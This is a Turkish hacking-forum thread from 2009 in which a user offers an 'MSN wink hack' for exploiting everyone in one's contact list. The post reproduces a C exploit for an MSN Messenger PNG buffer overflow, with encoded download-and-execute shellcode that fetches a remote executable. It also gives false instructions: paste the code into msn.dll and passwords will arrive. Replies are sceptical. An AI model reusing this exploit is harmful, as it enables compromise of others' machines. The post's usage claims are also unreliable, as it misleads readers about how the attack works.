İPUCU

Sosyal medya ve Sosyal Platformlar Sosyal Medya Ve Sosyal Platformlar Hakkında Her şey.

Seçenekler

göz kırpmasıyla msn hack bi deneyin zararı çıkmaz:d:D

zekimen - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2009
Mesajlar:
333
Konular:
170
Teşekkür (Etti):
104
Teşekkür (Aldı):
265
Ticaret:
(0) %
01-09-2009 16:16
#1
göz kırpmasıyla msn hack bi deneyin zararı çıkmaz:d:D
Kulağa Biraz Şaçma gibi Gelebilir.!Ama Gerçek
Bir Zamanlar Görüntü Resmi Expoit&l039;i Hazırladı Msn Açıqı Kapattı Kimisi Cam&l039;a Exploit hazırladı Msn Onunda Açığını Kapattı Şimdide Göz Kırpmalarınaa Msn Bunuda Açığını Kapatacağından Emin Olabilirsinizz..! Açık Kapanmadan Sömürün Bütün Msndeki Kişileri





Kod:

Kod:
(&l039;binary&l039; encoding is not supported, stored as-is) /*
*
* MSN Messenger PNG Image Buffer Overflow Download Sh*llcoded Exploit
* Bug discoveried by Core Security Technologies (www.coresecurity.com)
* Exploit coded By ATmaCA
* Copyright ?2002-2005 AtmacaSoft Inc. All Rights Reserved.
* Web: www.xteknik.com
* E-Mail: atmaca_at_icqmail.com
* Credit to kozan and delikon
* Usage:exploit
*
*/

/*
*
* Tested with MSN Messenger 6.2.0137
* This vulnerability can be exploited on Windows 2000 (all service packs)
* and Windows XP (all service packs) that run vulnerable
* clients of MSN Messenger.
*
*/


/*
*
* After creating vuln png image, open
* MSN Messenger and select it as your display picture in
* "Tools->Change Display Picture".
*
*/


linclude
linclude
linclude
linclude



lifdef __BORLandC__
linclude
lendif


ldefine NOP 0x90


char png_header[] =
"&l92;x89&l92;x50&l92;x4E&l92;x47&l92;x0D&l92; x0A& l92;x1A&l92;x0A&l92;x00&l92;x00&l92;x00&l92; x0D&l92; x 49&l92;x48&l92;x44&l92;x52"
"&l92;x00&l92;x00&l92;x00&l92;x40&l92;x00&l92; x00& l92;x00&l92;x40&l92;x08&l92;x03&l92;x00&l92; x00&l92; x 00&l92;x9D&l92;xB7&l92;x81"
"&l92;xEC&l92;x00&l92;x00&l92;x01&l92;xB9&l92; x74& l92;x52&l92;x4E&l92;x53";


char pngeof[] = "&l92;x90&l92;x90&l92;x90&l92;x59&l92;xE8&l92; x47& l92;xFE&l92;xFF&l92;xFF";


/* Generic win32 http download sh*llcode
xored with 0x1d by delikon (http://delikon.de/) */
char sh*llcode[] = "&l92;xEB"
"&l92;x10&l92;x58&l92;x31&l92;xC9&l92;x66&l92; x81& l92;xE9&l92;x22&l92;xFF&l92;x80&l92;x30&l92; x1D&l92; x 40&l92;xE2&l92;xFA&l92;xEB&l92;x05&l92;xE8&l92;xE B &l92;xFF"
"&l92;xFF&l92;xFF&l92;xF4&l92;xD1&l92;x1D&l92; x1D& l92;x1D&l92;x42&l92;xF5&l92;x4B&l92;x1D&l92; x1D&l92; x 1D&l92;x94&l92;xDE&l92;x4D&l92;x75&l92;x93&l92;x5 3 &l92;x13"
"&l92;xF1&l92;xF5&l92;x7D&l92;x1D&l92;x1D&l92; x1D& l92;x2C&l92;xD4&l92;x7B&l92;xA4&l92;x72&l92; x73&l92; x 4C&l92;x75&l92;x68&l92;x6F&l92;x71&l92;x70&l92;x4 9 &l92;xE2"
"&l92;xCD&l92;x4D&l92;x75&l92;x2B&l92;x07&l92; x32& l92;x6D&l92;xF5&l92;x5B&l92;x1D&l92;x1D&l92; x1D&l92; x 2C&l92;xD4&l92;x4C&l92;x4C&l92;x90&l92;x2A&l92;x4 B &l92;x90"
"&l92;x6A&l92;x15&l92;x4B&l92;x4C&l92;xE2&l92; xCD& l92;x4E&l92;x75&l92;x85&l92;xE3&l92;x97&l92; x13&l92; x F5&l92;x30&l92;x1D&l92;x1D&l92;x1D&l92;x4C&l92;x4 A &l92;xE2"
"&l92;xCD&l92;x2C&l92;xD4&l92;x54&l92;xFF&l92; xE3& l92;x4E&l92;x75&l92;x63&l92;xC5&l92;xFF&l92; x6E&l92; x F5&l92;x04&l92;x1D&l92;x1D&l92;x1D&l92;xE2&l92;xC D &l92;x48"
"&l92;x4B&l92;x79&l92;xBC&l92;x2D&l92;x1D&l92; x1D& l92;x1D&l92;x96&l92;x5D&l92;x11&l92;x96&l92; x6D&l92; x 01&l92;xB0&l92;x96&l92;x75&l92;x15&l92;x94&l92;xF 5 &l92;x43"
"&l92;x40&l92;xDE&l92;x4E&l92;x48&l92;x4B&l92; x4A& l92;x96&l92;x71&l92;x39&l92;x05&l92;x96&l92; x58&l92; x 21&l92;x96&l92;x49&l92;x18&l92;x65&l92;x1C&l92;xF 7 &l92;x96"
"&l92;x57&l92;x05&l92;x96&l92;x47&l92;x3D&l92; x1C& l92;xF6&l92;xFE&l92;x28&l92;x54&l92;x96&l92; x29&l92; x 96&l92;x1C&l92;xF3&l92;x2C&l92;xE2&l92;xE1&l92;x2 C &l92;xDD"
"&l92;xB1&l92;x25&l92;xFD&l92;x69&l92;x1A&l92; xDC& l92;xD2&l92;x10&l92;x1C&l92;xDA&l92;xF6&l92; xEF&l92; x 26&l92;x61&l92;x39&l92;x09&l92;x68&l92;xFC&l92;x9 6 &l92;x47"
"&l92;x39&l92;x1C&l92;xF6&l92;x7B&l92;x96&l92; x11& l92;x56&l92;x96&l92;x47&l92;x01&l92;x1C&l92; xF6&l92; x 96&l92;x19&l92;x96&l92;x1C&l92;xF5&l92;xF4&l92;x1 F &l92;x1D"
"&l92;x1D&l92;x1D&l92;x2C&l92;xDD&l92;x94&l92; xF7& l92;x42&l92;x43&l92;x40&l92;x46&l92;xDE&l92; xF5&l92; x 32&l92;xE2&l92;xE2&l92;xE2&l92;x70&l92;x75&l92;x7 5 &l92;x33"
"&l92;x78&l92;x65&l92;x78&l92;x1D";


FILE *di;
int i = 0;
short int weblength;
char *web;
char *pointer = NULL;
char *newsh*llcode;


/*xor cryptor*/
char *Sifrele(char *Name1)
&l123;
char *Name=Name1;
char xor=0x1d;
int Size=strlen(Name);
for(i=0;iName=Name^xor;
return Name;
}



**** main(int argc, char *argv[])
&l123;


if (argc < 3)
&l123;
printf("MSN Messenger PNG Image Buffer Overflow Download Sh*llcoded Exploit&l92;n");
printf("Bug discoveried by Core Security Technologies (www.coresecurity.com)&l92;n");
printf("Exploit coded By ATmaCA&l92;n");
printf("Copyright ?2002-2005 AtmacaSoft Inc. All Rights Reserved.&l92;n");
printf("Web:
http://www.atmacasoft.com&l92;n");
printf("E-Mail: atmaca_at_icqmail.com&l92;n");
printf("Credit to kozan and delikon&l92;n&l92;n");
printf("&l92;tUsage:exploit &l92;n");
printf("&l92;tExample:exploit vuln.png
http://www.atmacasoft.com/exp/msg.exe&l92;n");


return;
}



web = argv[2];



if( (di=fopen(argv[1],"wb" == NULL )
&l123;
printf("Error opening file!&l92;n");
return;
}
for(i=0;ifputc(png_header,di);


/*stuff in a couple of NOPs*/
for(i=0;i<99;i++)
fputc(NOP,di);


weblength=(short int)0xff22;
pointer=strstr(sh*llcode,"&l92;x22&l92;xff");
weblength-=strlen(web)+1;
memcpy(pointer,&weblength,2);
newsh*llcode = new char[sizeof(sh*llcode)+strlen(web)+1];
strcpy(newsh*llcode,sh*llcode);
strcat(newsh*llcode,Sifrele(web));
strcat(newsh*llcode,"&l92;x1d");


//sh*ll code
for(i=0;ifputc(newsh*llcode,di);



for(i=0;i<(83-strlen(web));i++) //NOPs
fputc(NOP,di);


/*Overwriting the return address (EIP)*/
/*0x005E0547 - ret */
fputc(0x47,di);
fputc(0x05,di);
fputc(0x5e,di);
fputc(0x00,di);


for(i=0;ifputc(pngeof,di);


printf("Vulnarable png file %s has been generated!&l92;n",argv[1]);


fclose(di);
}
bu kodları msn kurulu olduğu klasörün içinde msn.dll dosyasının en altına yazın ve kaydedin sonra msn den bi göz kırpması yollayın tamamdır şifre gelecek..
oynama yaptığınız dosyayı kopyalayın....ne olur ne olmaz


BYZEQ

JheqiLL - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
10/2007
Nereden:
Umudun Gölgesinden..
Mesajlar:
993
Konular:
177
Teşekkür (Etti):
64
Teşekkür (Aldı):
220
Ticaret:
(0) %
01-09-2009 19:05
#2
Alıntı:
bu kodları msn kurulu olduğu klasörün içinde msn.dll dosyasının en altına yazın ve kaydedin sonra msn den bi göz kırpması yollayın tamamdır şifre gelecek..





Bu nasıl 1 açık yf
---------------------
[T]ürk [H]ack [T]eam
Ne Mutlu Türküm Diyene!


╚═════════════════════╝
◄██▓▒░░░░░J░░░h░░░e░░░q░░i░░L░░░L▒▓██►

mrtogi - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2009
Mesajlar:
28
Konular:
9
Teşekkür (Etti):
5
Teşekkür (Aldı):
2
Ticaret:
(0) %
02-09-2009 14:46
#3
deneyen var mı bu kodları?
MaxMurat - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
02/2008
Nereden:
Win.32/system/
Mesajlar:
466
Konular:
14
Teşekkür (Etti):
16
Teşekkür (Aldı):
26
Ticaret:
(0) %
02-09-2009 16:13
#4
sen denedinmi? ve atmaca mail adressi kime ait? dene de bir sonra acikla
--------------------- http://www.TurkHackTeam.Org/Net

мΛхмuѓΛт
ßy_X-iR - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2009
Mesajlar:
331
Konular:
14
Teşekkür (Etti):
28
Teşekkür (Aldı):
21
Ticaret:
(0) %
02-09-2009 17:27
#5
akıcı anlatmamış
--------------------- BU İMZAYA ERİŞİM ENGELLENMİŞTİR!
Ankara 1. Sulh Ceza Mahkemesi 08/07/2008 tarih ve 2008/402 nolu kararı gereği bu imzaya erişim TELEKOMÜNİKASYON İLETİŞİM BAŞKANLIĞI’nca engellenmiştir.
Access to this signature is banned by TELEKOMÜNİKASYON İLETİŞİM BAŞKANLIĞI according to the order of: Ankara 1. Sulh Ceza Mahkemesi, 05/05/2008 of 2008/402.
makinetr - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2009
Mesajlar:
37
Konular:
1
Teşekkür (Etti):
88
Teşekkür (Aldı):
1
Ticaret:
(0) %
02-09-2009 20:16
#6
deneyen yokmu arkadaşlar
hergele2209 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2009
Mesajlar:
14
Konular:
1
Teşekkür (Etti):
0
Teşekkür (Aldı):
1
Ticaret:
(0) %
04-09-2009 22:18
#7
yöntem süper arkadaşlar ama deneyen varsa söylesin
nightmare53 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
09/2009
Mesajlar:
3
Konular:
0
Teşekkür (Etti):
0
Teşekkür (Aldı):
0
Ticaret:
(0) %
05-09-2009 12:36
#8
yok yaa denemeyin bence msninizi calcak bence oo cakkall =)
zekimen - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2009
Mesajlar:
333
Konular:
170
Teşekkür (Etti):
104
Teşekkür (Aldı):
265
Ticaret:
(0) %
05-09-2009 12:40
#9
yok artık kardeşim o zaman her paylaşımıma keylogger koyardım ...
--------------------- Geldi Ölümlü Yalan,Gitti Ölümsüz Gerçek ;

Siz Hayat Süren Leşler Sizi Kim DirilTecek...Üstad Necip FAZIL




free777 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
09/2007
Nereden:
istanbul
Mesajlar:
2.155
Konular:
139
Teşekkür (Etti):
23
Teşekkür (Aldı):
233
Ticaret:
(0) %
05-09-2009 13:06
#10
sen çok flim seyretmişin hala etkisindesin

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı